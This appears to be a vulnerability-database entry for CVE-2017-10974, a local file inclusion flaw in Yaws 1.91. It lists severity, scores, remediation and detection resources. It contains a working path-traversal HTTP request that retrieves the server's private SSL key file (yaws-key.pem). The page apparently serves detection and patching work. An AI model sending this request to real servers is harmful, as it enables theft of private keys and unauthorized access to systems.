🔙 목록으로 돌아가기

CVE-2017-10974: Yaws 1.91 - Local File Inclusion

TitleYaws 1.91 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactThe vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade to a patched version of Yaws or apply the necessary security patches.
CVSS Score7.5
EPSS Score0.89548
CVE IDCVE-2017-10974
CWE IDCWE-22
Tags cve cve2017 edb yaws lfi vkev vuln

🔍 Vulnerability Description

Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080.

🌐 HTTP Request

GET /%5C../ssl/yaws-key.pem HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-10974.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-10974.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A